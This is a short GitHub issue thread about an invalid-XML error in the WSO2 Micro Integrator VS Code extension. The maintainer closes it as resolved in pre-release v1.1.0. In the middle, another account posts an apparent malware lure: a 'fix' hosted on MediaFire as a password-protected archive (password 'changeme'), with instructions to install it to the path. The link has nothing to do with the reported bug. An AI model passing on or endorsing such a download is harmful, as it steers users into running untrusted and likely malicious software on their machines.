### ISSUE TITLE
Invalid XML error in proxy service when parameter is entered before target element

### ISSUE THREAD

**Issue by thuva9872** [wso2/mi-vscode#362]
$subject

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by thuva9872** [comment]
The latest pre-release v1.1.0 has resolved the issue. Please reopen if the problem persists.
